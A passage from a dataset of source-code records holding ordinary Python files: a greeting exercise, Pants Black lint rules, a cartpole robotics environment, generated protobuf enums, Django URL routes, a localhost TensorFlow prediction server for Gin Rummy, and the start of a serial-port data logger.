Dataset schema (column: type, value range; ⌀ = nullable):
- hexsha: stringlengths 40–40
- size: int64 4–1.02M
- ext: stringclasses 8 values
- lang: stringclasses 1 value
- max_stars_repo_path: stringlengths 4–209
- max_stars_repo_name: stringlengths 5–121
- max_stars_repo_head_hexsha: stringlengths 40–40
- max_stars_repo_licenses: listlengths 1–10
- max_stars_count: int64 1–191k ⌀
- max_stars_repo_stars_event_min_datetime: stringlengths 24–24 ⌀
- max_stars_repo_stars_event_max_datetime: stringlengths 24–24 ⌀
- max_issues_repo_path: stringlengths 4–209
- max_issues_repo_name: stringlengths 5–121
- max_issues_repo_head_hexsha: stringlengths 40–40
- max_issues_repo_licenses: listlengths 1–10
- max_issues_count: int64 1–67k ⌀
- max_issues_repo_issues_event_min_datetime: stringlengths 24–24 ⌀
- max_issues_repo_issues_event_max_datetime: stringlengths 24–24 ⌀
- max_forks_repo_path: stringlengths 4–209
- max_forks_repo_name: stringlengths 5–121
- max_forks_repo_head_hexsha: stringlengths 40–40
- max_forks_repo_licenses: listlengths 1–10
- max_forks_count: int64 1–105k ⌀
- max_forks_repo_forks_event_min_datetime: stringlengths 24–24 ⌀
- max_forks_repo_forks_event_max_datetime: stringlengths 24–24 ⌀
- content: stringlengths 4–1.02M
- avg_line_length: float64 1.07–66.1k
- max_line_length: int64 4–266k
- alphanum_fraction: float64 0.01–1

Each record below lists these fields in order: the file hexsha, size, ext, and lang; the max_stars / max_issues / max_forks repository metadata (path, repo name, head hexsha, licenses, count, min/max event datetime); the file content; and the avg_line_length, max_line_length, and alphanum_fraction statistics.
hexsha: a71d82604058e50763d2182e41135dff9c1f9cef | size: 202 | ext: py | lang: Python
max_stars:  print function/print Numbers/7Print_greet.py | palakbaphna/pyprac | 992770d5aed73c632a69b4bb22f471f35d083ee5 | ["Apache-2.0"] | count: null | null | null
max_issues: print function/print Numbers/7Print_greet.py | palakbaphna/pyprac | 992770d5aed73c632a69b4bb22f471f35d083ee5 | ["Apache-2.0"] | count: null | null | null
max_forks:  print function/print Numbers/7Print_greet.py | palakbaphna/pyprac | 992770d5aed73c632a69b4bb22f471f35d083ee5 | ["Apache-2.0"] | count: null | null | null
content:
# Write a program that greets the user by printing the word "Hello", a comma,
# the name of the user, and an exclamation mark after it.
name = input("What is your name? ")
print("Hello, %s!" %name)
avg_line_length: 25.25 | max_line_length: 76 | alphanum_fraction: 0.70297

hexsha: 95f36db5d41cb42274c19adec94c32eaecf83502 | size: 6,689 | ext: py | lang: Python
max_stars:  src/python/pants/backend/python/lint/black/rules.py | adam-singer/pants | 0fc6fb71e983487b3795ce6f34292967841e994d | ["Apache-2.0"] | count: null | null | null
max_issues: src/python/pants/backend/python/lint/black/rules.py | adam-singer/pants | 0fc6fb71e983487b3795ce6f34292967841e994d | ["Apache-2.0"] | count: null | null | null
max_forks:  src/python/pants/backend/python/lint/black/rules.py | adam-singer/pants | 0fc6fb71e983487b3795ce6f34292967841e994d | ["Apache-2.0"] | count: 1 | 2021-08-01T05:43:34.000Z | 2021-08-01T05:43:34.000Z
content:
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import re
from dataclasses import dataclass
from pathlib import PurePath
from typing import Tuple
from pants.backend.python.lint.black.subsystem import Black
from pants.backend.python.lint.python_fmt import PythonFmtRequest
from pants.backend.python.target_types import InterpreterConstraintsField, PythonSources
from pants.backend.python.util_rules import pex
from pants.backend.python.util_rules.pex import (
PexInterpreterConstraints,
PexRequest,
PexRequirements,
VenvPex,
VenvPexProcess,
)
from pants.core.goals.fmt import FmtResult
from pants.core.goals.lint import LintRequest, LintResult, LintResults
from pants.core.util_rules import stripped_source_files
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.engine.fs import Digest, GlobMatchErrorBehavior, MergeDigests, PathGlobs
from pants.engine.process import FallibleProcessResult, Process, ProcessResult
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import FieldSet
from pants.engine.unions import UnionRule
from pants.python.python_setup import PythonSetup
from pants.util.logging import LogLevel
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class BlackFieldSet(FieldSet):
required_fields = (PythonSources,)
sources: PythonSources
interpreter_constraints: InterpreterConstraintsField
class BlackRequest(PythonFmtRequest, LintRequest):
field_set_type = BlackFieldSet
@dataclass(frozen=True)
class SetupRequest:
request: BlackRequest
check_only: bool
@dataclass(frozen=True)
class Setup:
process: Process
original_digest: Digest
def generate_args(*, source_files: SourceFiles, black: Black, check_only: bool) -> Tuple[str, ...]:
args = []
if check_only:
args.append("--check")
if black.config:
args.extend(["--config", black.config])
args.extend(black.args)
# NB: For some reason, Black's --exclude option only works on recursive invocations, meaning
# calling Black on a directory(s) and letting it auto-discover files. However, we don't want
# Black to run over everything recursively under the directory of our target, as Black should
# only touch files directly specified. We can use `--include` to ensure that Black only
# operates on the files we actually care about.
args.extend(["--include", "|".join(re.escape(f) for f in source_files.files)])
args.extend(PurePath(f).parent.as_posix() for f in source_files.files)
return tuple(args)
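# Illustration (hypothetical paths): for source files "a/b.py" and "a/c.py", with no config
# file and no extra args, the tuple built above is roughly
#   ("--include", "a/b\.py|a/c\.py", "a", "a")
# i.e. Black recurses only into the parent directories and formats only the escaped filenames.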
@rule(level=LogLevel.DEBUG)
async def setup_black(
setup_request: SetupRequest, black: Black, python_setup: PythonSetup
) -> Setup:
# Black requires 3.6+ but uses the typed-ast library to work with 2.7, 3.4, 3.5, 3.6, and 3.7.
# However, typed-ast does not understand 3.8+, so instead we must run Black with Python 3.8+
    # when relevant. We only do this if <3.8 can't be used, as we don't want a loose requirement
# like `>=3.6` to result in requiring Python 3.8, which would error if 3.8 is not installed on
# the machine.
all_interpreter_constraints = PexInterpreterConstraints.create_from_compatibility_fields(
(field_set.interpreter_constraints for field_set in setup_request.request.field_sets),
python_setup,
)
tool_interpreter_constraints = (
all_interpreter_constraints
if (
all_interpreter_constraints.requires_python38_or_newer()
and black.options.is_default("interpreter_constraints")
)
else PexInterpreterConstraints(black.interpreter_constraints)
)
black_pex_request = Get(
VenvPex,
PexRequest(
output_filename="black.pex",
internal_only=True,
requirements=PexRequirements(black.all_requirements),
interpreter_constraints=tool_interpreter_constraints,
main=black.main,
),
)
config_digest_request = Get(
Digest,
PathGlobs(
globs=[black.config] if black.config else [],
glob_match_error_behavior=GlobMatchErrorBehavior.error,
description_of_origin="the option `--black-config`",
),
)
source_files_request = Get(
SourceFiles,
SourceFilesRequest(field_set.sources for field_set in setup_request.request.field_sets),
)
source_files, black_pex, config_digest = await MultiGet(
source_files_request, black_pex_request, config_digest_request
)
source_files_snapshot = (
source_files.snapshot
if setup_request.request.prior_formatter_result is None
else setup_request.request.prior_formatter_result
)
input_digest = await Get(Digest, MergeDigests((source_files_snapshot.digest, config_digest)))
process = await Get(
Process,
VenvPexProcess(
black_pex,
argv=generate_args(
source_files=source_files, black=black, check_only=setup_request.check_only
),
input_digest=input_digest,
output_files=source_files_snapshot.files,
description=f"Run Black on {pluralize(len(setup_request.request.field_sets), 'file')}.",
level=LogLevel.DEBUG,
),
)
return Setup(process, original_digest=source_files_snapshot.digest)
@rule(desc="Format with Black", level=LogLevel.DEBUG)
async def black_fmt(field_sets: BlackRequest, black: Black) -> FmtResult:
if black.skip:
return FmtResult.skip(formatter_name="Black")
setup = await Get(Setup, SetupRequest(field_sets, check_only=False))
result = await Get(ProcessResult, Process, setup.process)
return FmtResult.from_process_result(
result,
original_digest=setup.original_digest,
formatter_name="Black",
strip_chroot_path=True,
)
@rule(desc="Lint with Black", level=LogLevel.DEBUG)
async def black_lint(field_sets: BlackRequest, black: Black) -> LintResults:
if black.skip:
return LintResults([], linter_name="Black")
setup = await Get(Setup, SetupRequest(field_sets, check_only=True))
result = await Get(FallibleProcessResult, Process, setup.process)
return LintResults(
[LintResult.from_fallible_process_result(result, strip_chroot_path=True)],
linter_name="Black",
)
def rules():
return [
*collect_rules(),
UnionRule(PythonFmtRequest, BlackRequest),
UnionRule(LintRequest, BlackRequest),
*pex.rules(),
*stripped_source_files.rules(),
]
avg_line_length: 36.551913 | max_line_length: 100 | alphanum_fraction: 0.719839

hexsha: 5828b63f391dedb073b7537080e01780e97ab287 | size: 8,625 | ext: py | lang: Python
max_stars:  pyrobolearn/envs/control/cartpole.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | ["Apache-2.0"] | count: 2 | 2021-01-21T21:08:30.000Z | 2022-03-29T16:45:49.000Z
max_issues: pyrobolearn/envs/control/cartpole.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | ["Apache-2.0"] | count: null | null | null
max_forks:  pyrobolearn/envs/control/cartpole.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | ["Apache-2.0"] | count: 1 | 2020-09-29T21:25:39.000Z | 2020-09-29T21:25:39.000Z
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provide the inverted pole on a cart (Cartpole) environment.
This is based on the control problem proposed in OpenAI Gym:
"A pole is attached by an un-actuated joint to a cart, which moves along a frictionless track. The system is
controlled by applying a force of +1 or -1 to the cart. The pendulum starts upright, and the goal is to prevent it
from falling over. A reward of +1 is provided for every timestep that the pole remains upright. The episode ends when
the pole is more than 15 degrees from vertical, or the cart moves more than 2.4 units from the center." [1]
Note that compared to [1], you can specify the number of links that forms the inverted pole.
References:
- [1] Cartpole environment in OpenAI Gym: https://gym.openai.com/envs/CartPole-v1/
- [2] "Neuronlike Adaptive Elements That Can Solve Difficult Learning Control Problem", Barto et al., 1993.
"""
import numpy as np
import pyrobolearn as prl
from pyrobolearn.envs.control.control import ControlEnv
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2019, PyRoboLearn"
__credits__ = ["OpenAI", "Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class CartpoleEnv(ControlEnv):
r"""Cartpole Environment
This is based on the control problem proposed in OpenAI Gym:
"A pole is attached by an un-actuated joint to a cart, which moves along a frictionless track. The system is
controlled by applying a force of +1 or -1 to the cart. The pendulum starts upright, and the goal is to prevent it
from falling over. A reward of +1 is provided for every timestep that the pole remains upright. The episode ends
when the pole is more than 15 degrees from vertical, or the cart moves more than 2.4 units from the center." [1]
Note that compared to [1], you can specify the number of links that forms the inverted pole.
Here are the various environment features (from [1]):
- world: basic world with gravity enabled, a basic floor and the cartpole.
- state: the state is given by :math:`[x, \dot{x}, q_1, \dot{q}_1]` for one inverted pole with one link.
- action: discrete forces applied on the cart (+10., -10.)
- reward: +1 until termination step
- initial state generator: initialize uniformly the state with [-0.05, 0.05]
- physics randomizer: uniform distribution of the mass of the [mass - mass/10, mass + mass/10]
- terminal conditions:
- pole angle is more than 12 degrees
- cart position is more than 2.5m from the center
- episode length is greater than 200 steps
References:
- [1] Cartpole environment in OpenAI Gym: https://gym.openai.com/envs/CartPole-v1/
- [2] "Neuronlike Adaptive Elements That Can Solve Difficult Learning Control Problem", Barto et al., 1993.
"""
def __init__(self, simulator=None, num_links=1, num_steps=200, verbose=True):
"""
Initialize the Cartpole environment.
Args:
simulator (Simulator): simulator instance. If None, by default, it will instantiate the Bullet
simulator.
num_links (int): the number of links that forms the inverted pendulum.
verbose (bool): if True, it will print information when creating the environment.
"""
# simulator
if simulator is None:
simulator = prl.simulators.Bullet(render=verbose)
# create basic world
world = prl.worlds.World(simulator)
robot = prl.robots.CartPole(simulator, position=(0., 0., 0.), num_links=num_links, inverted_pole=False)
world.load_robot(robot)
robot.disable_motor(robot.joints)
if verbose:
robot.print_info()
# create state: [x, \dot{x}, q_i, \dot{q}_i]
state = prl.states.JointPositionState(robot) + prl.states.JointVelocityState(robot)
if verbose:
print("\nState: {}".format(state))
# create action: f_cart = (-10., +10.)
action = prl.actions.JointForceAction(robot=robot, joint_ids=0, discrete_values=[-10., 10.])
if verbose:
print("\nAction: {}".format(action))
# create terminal condition
pole_angle_condition = prl.terminal_conditions.JointPositionCondition(robot, joint_ids=1,
bounds=(-12 * np.pi/180, 12 * np.pi/180),
out=False, stay=True)
cart_position_condition = prl.terminal_conditions.LinkPositionCondition(robot, link_id=1, bounds=(-1., 1.),
dim=0, out=False, stay=True)
time_length_condition = prl.terminal_conditions.TimeLimitCondition(num_steps=num_steps)
terminal_conditions = [pole_angle_condition, cart_position_condition, time_length_condition]
# create reward: +1 until termination step
reward = prl.rewards.TerminalReward(terminal_conditions=terminal_conditions, subreward=1., final_reward=1.)
if verbose:
print("\nReward: {}".format(state))
# create initial state generator: generate the state each time we reset the environment
def reset_robot(robot): # function to disable the motors every time we reset the joint state
def reset():
robot.disable_motor(robot.joints)
return reset
initial_state_generator = prl.states.generators.UniformStateGenerator(state=state, low=-0.05, high=0.05,
fct=reset_robot(robot))
# create environment using composition
super(CartpoleEnv, self).__init__(world=world, states=state, rewards=reward, actions=action,
terminal_conditions=terminal_conditions,
initial_state_generators=initial_state_generator)
# class CartDoublePoleEnv(Env):
# r"""CartDoublepole Environment
#
# This provide the double inverted poles on a cart environment. Compare to the standard inverted pendulum on a cart,
# the goal this time is to balance two poles of possibly different lengths / masses, which are initialized at
# different angles but connected at the same joint attached to the cart.
# """
#
# def __init__(self, simulator=None, pole_lengths=(1., 1.), pole_masses=(1., 1.), pole_angles=(0., 0.)):
# """
# Initialize the double inverted poles on a cart environment.
#
# Args:
# simulator (Simulator): simulator instance.
# """
# # create basic world
# world = prl.worlds.BasicWorld(simulator)
# robot = prl.robots.CartDoublePole(simulator, pole_lengths=pole_lengths, pole_masses=pole_masses,
# pole_angles=pole_angles)
# world.load_robot(robot)
#
# # create state
# state =
#
# # create action
# action =
#
# # create reward
# reward =
#
# # create terminal condition
# terminal_condition =
#
# # create initial state generator
# initial_state_generator =
#
# # create environment using composition
# super(CartDoublePoleEnv, self).__init__(world=world, states=state, rewards=reward, actions=action)
# Test
if __name__ == "__main__":
from itertools import count
# create simulator
sim = prl.simulators.Bullet()
# create environment
env = CartpoleEnv(sim)
state = env.reset()
# run simulation
for _ in count():
state, reward, done, info = env.step(sleep_dt=1./240)
print("done: {}, reward: {}, state: {}".format(done, reward, state))
# # create basic world
# sim = prl.simulators.Bullet()
# world = prl.worlds.World(sim)
# robot = prl.robots.CartPole(sim, num_links=1, inverted_pole=True)
# robot.disable_motor(robot.joints)
# world.load_robot(robot)
#
# # create state: [x, \dot{x}, q_i, \dot{q}_i]
# state = prl.states.JointPositionState(robot) + prl.states.JointVelocityState(robot)
#
# # create action
# action = prl.actions.JointForceAction(robot=robot, joint_ids=0, discrete_values=[-10., 10.])
#
# flip = 1
# for i in prl.count():
# # if i % 10 == 0:
# # flip = (flip+1) % 2
# action(flip)
# world.step(sleep_dt=sim.dt)
avg_line_length: 43.341709 | max_line_length: 120 | alphanum_fraction: 0.641159

hexsha: edd861c146aa83221cb13988a31f0ac1ac9c2438 | size: 5,144 | ext: py | lang: Python
max_stars:  google/ads/google_ads/v1/proto/enums/price_extension_type_pb2.py | jwygoda/google-ads-python | 863892b533240cb45269d9c2cceec47e2c5a8b68 | ["Apache-2.0"] | count: null | null | null
max_issues: google/ads/google_ads/v1/proto/enums/price_extension_type_pb2.py | jwygoda/google-ads-python | 863892b533240cb45269d9c2cceec47e2c5a8b68 | ["Apache-2.0"] | count: null | null | null
max_forks:  google/ads/google_ads/v1/proto/enums/price_extension_type_pb2.py | jwygoda/google-ads-python | 863892b533240cb45269d9c2cceec47e2c5a8b68 | ["Apache-2.0"] | count: null | null | null
content:
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v1/proto/enums/price_extension_type.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v1/proto/enums/price_extension_type.proto',
package='google.ads.googleads.v1.enums',
syntax='proto3',
serialized_options=_b('\n!com.google.ads.googleads.v1.enumsB\027PriceExtensionTypeProtoP\001ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v1/enums;enums\242\002\003GAA\252\002\035Google.Ads.GoogleAds.V1.Enums\312\002\035Google\\Ads\\GoogleAds\\V1\\Enums\352\002!Google::Ads::GoogleAds::V1::Enums'),
serialized_pb=_b('\n>google/ads/googleads_v1/proto/enums/price_extension_type.proto\x12\x1dgoogle.ads.googleads.v1.enums\x1a\x1cgoogle/api/annotations.proto\"\xeb\x01\n\x16PriceExtensionTypeEnum\"\xd0\x01\n\x12PriceExtensionType\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\n\n\x06\x42RANDS\x10\x02\x12\n\n\x06\x45VENTS\x10\x03\x12\r\n\tLOCATIONS\x10\x04\x12\x11\n\rNEIGHBORHOODS\x10\x05\x12\x16\n\x12PRODUCT_CATEGORIES\x10\x06\x12\x11\n\rPRODUCT_TIERS\x10\x07\x12\x0c\n\x08SERVICES\x10\x08\x12\x16\n\x12SERVICE_CATEGORIES\x10\t\x12\x11\n\rSERVICE_TIERS\x10\nB\xec\x01\n!com.google.ads.googleads.v1.enumsB\x17PriceExtensionTypeProtoP\x01ZBgoogle.golang.org/genproto/googleapis/ads/googleads/v1/enums;enums\xa2\x02\x03GAA\xaa\x02\x1dGoogle.Ads.GoogleAds.V1.Enums\xca\x02\x1dGoogle\\Ads\\GoogleAds\\V1\\Enums\xea\x02!Google::Ads::GoogleAds::V1::Enumsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE = _descriptor.EnumDescriptor(
name='PriceExtensionType',
full_name='google.ads.googleads.v1.enums.PriceExtensionTypeEnum.PriceExtensionType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BRANDS', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EVENTS', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LOCATIONS', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEIGHBORHOODS', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRODUCT_CATEGORIES', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRODUCT_TIERS', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SERVICES', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SERVICE_CATEGORIES', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SERVICE_TIERS', index=10, number=10,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=155,
serialized_end=363,
)
_sym_db.RegisterEnumDescriptor(_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE)
_PRICEEXTENSIONTYPEENUM = _descriptor.Descriptor(
name='PriceExtensionTypeEnum',
full_name='google.ads.googleads.v1.enums.PriceExtensionTypeEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=128,
serialized_end=363,
)
_PRICEEXTENSIONTYPEENUM_PRICEEXTENSIONTYPE.containing_type = _PRICEEXTENSIONTYPEENUM
DESCRIPTOR.message_types_by_name['PriceExtensionTypeEnum'] = _PRICEEXTENSIONTYPEENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PriceExtensionTypeEnum = _reflection.GeneratedProtocolMessageType('PriceExtensionTypeEnum', (_message.Message,), dict(
DESCRIPTOR = _PRICEEXTENSIONTYPEENUM,
__module__ = 'google.ads.googleads_v1.proto.enums.price_extension_type_pb2'
,
__doc__ = """Container for enum describing types for a price extension.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v1.enums.PriceExtensionTypeEnum)
))
_sym_db.RegisterMessage(PriceExtensionTypeEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
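# A minimal usage sketch (module path assumed from the repo layout above; values as generated):
#   from google.ads.google_ads.v1.proto.enums import price_extension_type_pb2 as pet
#   pet.PriceExtensionTypeEnum.PriceExtensionType.Value('BRANDS')   # -> 2
#   pet.PriceExtensionTypeEnum.PriceExtensionType.Name(2)           # -> 'BRANDS'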
avg_line_length: 39.875969 | max_line_length: 884 | alphanum_fraction: 0.77119

hexsha: 98f4c5a5d7e6f34e06cad5324f9401ca3d0646f8 | size: 279 | ext: py | lang: Python
max_stars:  embark/users/urls.py | YulianaPoliakova/embark | 5dc11114b2348ce1b580a9f18dd081018ac9d07f | ["MIT"] | count: 149 | 2021-07-27T08:22:33.000Z | 2022-03-26T23:25:20.000Z
max_issues: embark/users/urls.py | IoTSecurity101/embark | cb0336459bf8d2a59c54b001fc0f4bf126a9b986 | ["MIT"] | count: 22 | 2021-07-28T07:32:11.000Z | 2022-03-30T12:02:49.000Z
max_forks:  embark/users/urls.py | IoTSecurity101/embark | cb0336459bf8d2a59c54b001fc0f4bf126a9b986 | ["MIT"] | count: 23 | 2021-07-30T07:34:53.000Z | 2022-03-24T12:37:51.000Z
content:
# from django.urls import path, include
from django.urls import path
from . import views
urlpatterns = [
path('signin', views.signin, name='embark-signin'),
path('signup', views.signup, name='embark-signup'),
path('signout', views.signout, name='embark-signout')
]
avg_line_length: 25.363636 | max_line_length: 57 | alphanum_fraction: 0.698925

hexsha: 2d08c6910481bcba0bc97181575ff3234dd1a236 | size: 3,811 | ext: py | lang: Python
max_stars:  results/Random16/Random16Last-DIA16/testserver.py | sangttruong/GinRummy | 45f6a10eeb53b979b152d6bf9e904f38df9473f0 | ["MIT"] | count: 3 | 2020-09-07T02:02:20.000Z | 2021-06-30T16:27:08.000Z
max_issues: results/Random16/Random16Last-DIA16/testserver.py | sangttruong/GinRummy | 45f6a10eeb53b979b152d6bf9e904f38df9473f0 | ["MIT"] | count: 10 | 2021-06-22T17:10:12.000Z | 2021-07-18T02:02:03.000Z
max_forks:  results/Random16/Random16Last-DIA16/testserver.py | sangttruong/GinRummy | 45f6a10eeb53b979b152d6bf9e904f38df9473f0 | ["MIT"] | count: 3 | 2021-04-04T18:02:27.000Z | 2022-03-07T03:18:14.000Z
content:
import numpy as np
import sys
import os
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
sys.stderr = stderr
# disable any warnings by TensorFlow.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import datetime
import random
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
import tensorflow as tf
#import tensorflow.python.keras.backend as K
from tensorflow.python.keras import Input
from tensorflow.python.keras.models import Sequential, Model, model_from_yaml, load_model
from tensorflow.python.keras.layers import Dense, Flatten, Conv2D, LeakyReLU, concatenate, Dropout
from tensorflow.python.keras.callbacks import Callback, EarlyStopping, LearningRateScheduler
def DualInception():
x = Input(shape = (4,13,1,), name = 'x')
f = Input(shape = (4,), name = 'f')
g = Input(shape = (126,), name = 'g')
o = Input(shape = (4,13,1,), name = 'o')
x41 = Conv2D(filters = 16, kernel_size = 4, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'x41')(x)
x4 = Flatten(name = 'x4')(x41)
x31 = Conv2D(filters = 16, kernel_size = 3, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'x31')(x)
x3 = Flatten(name = 'x3')(x31)
x21 = Conv2D(filters = 16, kernel_size = 2, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'x21')(x)
x2 = Flatten(name = 'x2')(x21)
o41 = Conv2D(filters = 16, kernel_size = 4, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'o41')(o)
o4 = Flatten(name = 'o4')(o41)
o31 = Conv2D(filters = 16, kernel_size = 3, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'o31')(o)
o3 = Flatten(name = 'o3')(o31)
o21 = Conv2D(filters = 16, kernel_size = 2, strides = 1, padding = 'valid', activation = 'relu', data_format = 'channels_last', name = 'o21')(o)
o2 = Flatten(name = 'o2')(o21)
i = concatenate([f, o4, o3, o2, x4, x3, x2], name = 'concat')
i1 = Dense(16, activation = 'relu', name = 'dense1')(i)
y = Dense(1, name = 'y')(i1)
model = Model(inputs = [x, f, g, o], outputs = y)
model.compile(loss = 'mse', optimizer = 'adam')
return model
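# For reference, DualInception() above expects inputs with shapes (batch dimension first):
#   x: (None, 4, 13, 1), f: (None, 4), g: (None, 126), o: (None, 4, 13, 1), output y: (None, 1)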
NN = DualInception()
checkpoint_path = '/Users/sangtruong_2021/Desktop/Checkpoint/cp.ckpt'
NN.load_weights(checkpoint_path)
print(NN.summary())
def addGeoRelation_Numpy(x):
t = []
for i in range(13):
n = i
while(n < 52):
z = 1
next = n+13*z
while(next < 52):
t.append(x[n]*x[next])
z += 1
next = n+13*z
if n != 12 and n != 25 and n != 38 and n != 51:
t.append(x[n]*x[n+1])
n += 13
return np.array(t)
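# Note: for a 52-card one-hot vector laid out as 4 suits x 13 ranks (an assumption based on the
# reshapes below), the products in addGeoRelation_Numpy pair each card with the same rank in
# later suits (n, n+13*z) and with the next rank in the same suit (n, n+1), yielding the 126
# pairwise "geometric relation" features fed to input g.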
import socket
import ast
listensocket = socket.socket()
listensocket.bind(("127.0.0.1", 8888))
listensocket.listen(999999999)
print("Server started at 127.0.0.1 on port " + str(8888))
running = True
while running:
(clientsocket, address) = listensocket.accept()
# print("New connection make!")
xfo = clientsocket.recv(1024).decode() # Get a number from Java
xfo = xfo[1:-2]
xfo = list(map(float, xfo.split(", ")))
xfo = np.array(xfo)
x = xfo[0:52]
g = addGeoRelation_Numpy(x)
g = g.reshape((-1,126))
x = x.reshape((-1,4,13,1))
f = xfo[53:57]
f = f.reshape((-1,4))
o = xfo[57:109]
o = o.reshape((-1,4,13,1))
# print(x)
# print(g)
# print(f)
# print(o)
y = NN([x, f, g, o])
# print(y)
y = y.numpy()
y = y[0][0]
# print(y)
# print(type(y))
newMessage = str(y)
# print("Output: " + newMessage)
clientsocket.send(newMessage.encode()) # Send a number back to Java
#print("Computed and sent!")
clientsocket.close()
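# A minimal client sketch (illustrative; assumes the same framing the loop above strips with
# xfo[1:-2], i.e. a bracketed, comma-separated list of at least 109 floats plus a newline):
#
#   import socket
#   values = [0.0] * 109                        # 52 (x) + 1 unused + 4 (f) + 52 (o)
#   s = socket.socket()
#   s.connect(("127.0.0.1", 8888))
#   s.send((str(values) + "\n").encode())
#   print(float(s.recv(1024).decode()))         # predicted value y
#   s.close()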
avg_line_length: 30.733871 | max_line_length: 146 | alphanum_fraction: 0.625558

hexsha: 3577db12885dab7e7c69c55e40635876cb1df499 | size: 4,178 | ext: py | lang: Python
max_stars:  multilogger.py | guolivar/multi-serial-logger | cdc91daa65eeb1148a291ca7371c995390cf0992 | ["MIT"] | count: null | null | null
max_issues: multilogger.py | guolivar/multi-serial-logger | cdc91daa65eeb1148a291ca7371c995390cf0992 | ["MIT"] | count: null | null | null
max_forks:  multilogger.py | guolivar/multi-serial-logger | cdc91daa65eeb1148a291ca7371c995390cf0992 | ["MIT"] | count: null | null | null
content:
#!/usr/bin/env python
# Load the libraries
import serial # Serial communications
import time # Timing utilities
import os,sys # OS utils to keep working directory
# Change working directory to the script's path
os.chdir(os.path.dirname(sys.argv[0]))
# Set the time constants
rec_time=time.gmtime()
timestamp = time.strftime("%Y/%m/%d %H:%M:%S GMT",rec_time)
prev_minute=rec_time[4]
# Read the settings from the settings file
settings_file = open("./settings.txt")
# How many serial ports? -- MUST match the number of serial config lines in the settings file
nports = eval(settings_file.readline().rstrip('\n'))
# Initialise the lists of data to hold parameters for each instrument
prefixes = []
ports = []
bauds = []
xpars = []
xbytes = []
eols = []
# Read each of the serial config lines from the settings file
for i in range(nports):
# e.g. "instrumentX,/dev/ttyUSB0,9600,N,8,n"
settings_line = settings_file.readline().rstrip('\n').split(',')
prefixes.append(settings_line[0])
ports.append(settings_line[1])
bauds.append(settings_line[2])
xpars.append(settings_line[3])
xbytes.append(eval(settings_line[4]))
if settings_line[5] == 'r':
eols.append(b'\r')
elif settings_line[5] == 'nr':
eols.append(b'\n\r')
else:
eols.append(b'\n')
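# An illustrative settings.txt for two instruments (hypothetical device names and ports):
#   2
#   co2sensor,/dev/ttyUSB0,9600,N,8,n
#   anemometer,/dev/ttyUSB1,115200,N,8,r
#   /home/logger/data/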
print(ports)
# path for data files
# e.g. "/home/logger/data/"
datapath = settings_file.readline().rstrip('\n')
print(datapath)
# Format for filenames
fnamefmt = "%Y%m%d.txt"
# LOG some info
current_LOG_name = datapath + time.strftime("%Y%m%d.LOG", rec_time)
current_file = open(current_LOG_name, "a")
current_file.write(timestamp + " Logging starts\n")
current_file.write(",".join(prefixes))
current_file.write("\n")
current_file.write(",".join(ports))
current_file.write("\n")
